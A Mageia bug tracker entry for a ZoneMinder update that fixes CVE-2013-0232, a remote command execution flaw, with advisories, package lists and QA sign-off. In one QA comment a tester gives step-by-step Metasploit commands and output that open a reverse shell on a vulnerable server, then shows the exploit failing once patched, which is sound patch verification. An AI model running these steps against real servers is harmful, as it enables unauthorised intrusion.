Bug 9402 - zoneminder new security issues CVE-2013-0232 and CVE-2013-0332
: zoneminder new security issues CVE-2013-0232 and CVE-2013-0332
Status: RESOLVED FIXED
Product: Mageia
Classification: Unclassified
Component: Security
: 2
: i586 Linux
: Normal Severity: normal
: ---
Assigned To: QA Team
: Sec team
: http://lwn.net/Vulnerabilities/543093/
: has_procedure mga2-64-OK mga2-32-ok
: validated_update
: 2317
:
  Show dependency treegraph
 
Reported: 2013-03-15 16:28 CET by David Walser
Modified: 2013-04-02 22:12 CEST (History)
3 users (show)

See Also:
Source RPM: zoneminder-1.25.0-21.mga3.src.rpm
CVE:


Attachments

Description David Walser 2013-03-15 16:28:15 CET
Debian has issued an advisory on March 14:
http://www.debian.org/security/2013/dsa-2640

Reproducible: 

Steps to Reproduce:
Comment 1 Barry Jackson 2013-03-16 15:32:35 CET
(In reply to David Walser from comment #0)
> Debian has issued an advisory on March 14:
> http://www.debian.org/security/2013/dsa-2640

Thanks for bringing to my attention.

CVE-2013-0332 
This is already handled upstream in the source tarball that we are using in both 2 and Cauldron.

CVE-2013-0232
I have patched both 2 and Cauldron versions locally and am testing builds of both before pushing to Cauldron and 2/updates-testing.
Comment 2 Barry Jackson 2013-03-16 17:01:54 CET
############################
Advisory

zoneminder packages have been updated for the following vulnerability.

CVE-2013-0232
zoneminder is prone to an arbitrary command execution vulnerability. Remote (authenticated) attackers could execute arbitrary commands as the web server user.

References:
http://www.zoneminder.com/forums/viewtopic.php?f=29&t=20771

http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/

https://bugzilla.redhat.com/show_bug.cgi?id=904104


Updated packages in 2/core/updates_testing:
========================
zoneminder-1.25.0-10.2.mga2.x86_64.rpm
zoneminder-1.25.0-10.2.mga2.i586.rpm

Source rpm:
zoneminder-1.25.0-10.2.mga2.src.rpm

Note:
This will need pushing to tainted as well as core when accepted.
Comment 3 David Walser 2013-03-16 17:06:56 CET
Thanks.

(In reply to Barry Jackson from comment #2)
> Note:
> This will need pushing to tainted as well as core when accepted.

Then you'll need to push a build to tainted.

mgarepo submit zoneminder --define section=tainted/release
mgarepo 2/zoneminder --define section=tainted/updates_testing -t 2
Comment 4 Barry Jackson 2013-03-16 17:37:29 CET
I already did for cauldron - now done for 2 as well.
Comment 5 David Walser 2013-03-16 17:46:26 CET
Thanks Barry!

Assigning to QA.

Advisory:
========================

Updated zoneminder package fixes security vulnerability:

zoneminder is prone to an arbitrary command execution vulnerability. Remote
(authenticated) attackers could execute arbitrary commands as the web server
user (CVE-2013-0232).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0232
http://www.zoneminder.com/forums/viewtopic.php?f=29&t=20771
http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/
https://bugzilla.redhat.com/show_bug.cgi?id=904104
http://www.debian.org/security/2013/dsa-2640
========================

Updated packages in {core,tainted}/updates_testing:
========================
zoneminder-1.25.0-10.2.mga2

from zoneminder-1.25.0-10.2.mga2.src.rpm
Comment 6 claire robinson 2013-03-16 20:00:14 CET
There are two srpms

zoneminder-1.25.0-10.2.mga2.src.rpm
zoneminder-1.25.0-10.2.mga2.tainted.src.rpm


Testing x86_64

Before
------
Confirmed vulnerable using the module in metasploit from git

$ mkdir metasploit
$ cd metasploit
$ git clone https://github.com/bcoles/metasploit-framework.git
$ cd metasploit-framework
$ ./msfconsole -L

At msf prompt

msf > use exploit/unix/webapp/zoneminder_packagecontrol_exec

msf  exploit(zoneminder_packagecontrol_exec) > set RHOST <IP of zoneminder server>

If you've set a login on zoneminder also set USERNAME and set PASSWORD

msf  exploit(zoneminder_packagecontrol_exec) > exploit

[*] ServerIP:80 - Authenticating as user 'username'
[*] Started reverse double handler
[+] ServerIP:80 - Authenticated successfully
[*] ServerIP:80 - Sending payload (525 bytes)
[+] ServerIP:80 - Payload sent successfully
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo bP9pMxbEZnF9eZC9;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "bP9pMxbEZnF9eZC9\r\n"
[*] Matching...
[*] B is input...
[*] ServerIP - Command shell session 1 opened at Sat Mar 16 18:33:13 +0000 2013

ls

ajax
cambozola.jar
css
events
graphics
images
includes
index.php
js
lang
mootools-1.2.3-core-yc.js
mootools.js
skins
sounds
temp
tools
views

^C
Abort session 1? [y/N]  y

[*] Command shell session 1 closed.  Reason: User exit

msf  exploit(zoneminder_packagecontrol_exec) > quit

After
-----
msf  exploit(zoneminder_packagecontrol_exec) > exploit

[*] Started reverse double handler
[*] ServerIP:80 - Authenticating as user 'username'
[+] ServerIP:80 - Authenticated successfully
[*] ServerIP:80 - Sending payload (525 bytes)
[+] ServerIP:80 - Payload sent successfully
msf  exploit(zoneminder_packagecontrol_exec) > quit

Tested again with zoneminder from tainted updates testing - OK
No regressions noticed.


Adding bug 2317 for links required from core release to tainted updates testing

Running checks for "zoneminder" using media
"Core Release" and "Tainted Updates Testing".
----------------------------------------
Mageia release 2 (Official) for x86_64
Latest version found in "Core Release" is zoneminder-1.25.0-10.mga2
Latest version found in "Tainted Updates Testing" is zoneminder-1.25.0-10.2.mga2.tainted
----------------------------------------
The following packages will require linking:

lame-3.99.5-1.mga2.tainted (Tainted Release)
libatk1.0_0-2.4.0-1.mga2 (Core 32bit Release)
libbzip2_1-1.0.6-1.mga2 (Core 32bit Release)
libcairo2-1.10.2-6.mga2 (Core 32bit Release)
libcairo-xcb2-1.10.2-6.mga2 (Core 32bit Release)
libdatrie1-0.2.5-1.mga2 (Core 32bit Release)
libfontconfig1-2.8.0-6.mga2 (Core 32bit Release)
libgamin-1_0-0.1.10-8.mga2 (Core 32bit Release)
libgnome-keyring0-3.4.1-1.mga2 (Core 32bit Release)
libjasper1-1.900.1-13.mga2 (Core 32bit Release)
liblzma5-5.0.3-3.mga2 (Core 32bit Release)
libpcre0-8.21-1.mga2 (Core 32bit Release)
libpng15_15-1.5.10-1.mga2 (Core 32bit Release)
libsasl2-2.1.23-19.mga2 (Core 32bit Release)
libsoup2.4_1-2.38.1-1.mga2 (Core 32bit Release)
libthai0-0.1.14-1.mga1 (Core 32bit Release)
libudev0-181-8.mga2 (Core 32bit Release)
libxft2-2.3.0-1.mga2 (Core 32bit Release)
libxrender1-0.9.7-1.mga2 (Core 32bit Release)
----------------------------------------
Comment 7 claire robinson 2013-03-18 16:06:11 CET
Testing complete mga2 32

Advisory:
========================

Updated zoneminder package fixes security vulnerability:

Zoneminder is prone to an arbitrary command execution vulnerability. Remote
(authenticated) attackers could execute arbitrary commands as the web server
user (CVE-2013-0232).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0232
http://www.zoneminder.com/forums/viewtopic.php?f=29&t=20771
http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/
https://bugzilla.redhat.com/show_bug.cgi?id=904104
http://www.debian.org/security/2013/dsa-2640
========================

SRPM's:
zoneminder-1.25.0-10.2.mga2.src.rpm
zoneminder-1.25.0-10.2.mga2.tainted.src.rpm

For bug 2317..
----------------------------------------
The following packages will require linking:

lame-3.99.5-1.mga2.tainted (Tainted Release)
libatk1.0_0-2.4.0-1.mga2 (Core 32bit Release)
libbzip2_1-1.0.6-1.mga2 (Core 32bit Release)
libcairo2-1.10.2-6.mga2 (Core 32bit Release)
libcairo-xcb2-1.10.2-6.mga2 (Core 32bit Release)
libdatrie1-0.2.5-1.mga2 (Core 32bit Release)
libfontconfig1-2.8.0-6.mga2 (Core 32bit Release)
libgamin-1_0-0.1.10-8.mga2 (Core 32bit Release)
libgnome-keyring0-3.4.1-1.mga2 (Core 32bit Release)
libjasper1-1.900.1-13.mga2 (Core 32bit Release)
liblzma5-5.0.3-3.mga2 (Core 32bit Release)
libpcre0-8.21-1.mga2 (Core 32bit Release)
libpng15_15-1.5.10-1.mga2 (Core 32bit Release)
libsasl2-2.1.23-19.mga2 (Core 32bit Release)
libsoup2.4_1-2.38.1-1.mga2 (Core 32bit Release)
libthai0-0.1.14-1.mga1 (Core 32bit Release)
libudev0-181-8.mga2 (Core 32bit Release)
libxft2-2.3.0-1.mga2 (Core 32bit Release)
libxrender1-0.9.7-1.mga2 (Core 32bit Release)
----------------------------------------

Could sysadmin please push from core & tainted updates testing to core & tainted updates and also make the required links for bug 2317.

Thanks!
Comment 8 Thomas Backlund 2013-04-02 22:12:04 CEST
Packages linked and update pushed:
https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0104

Note You need to log in before you can comment on or make changes to this bug.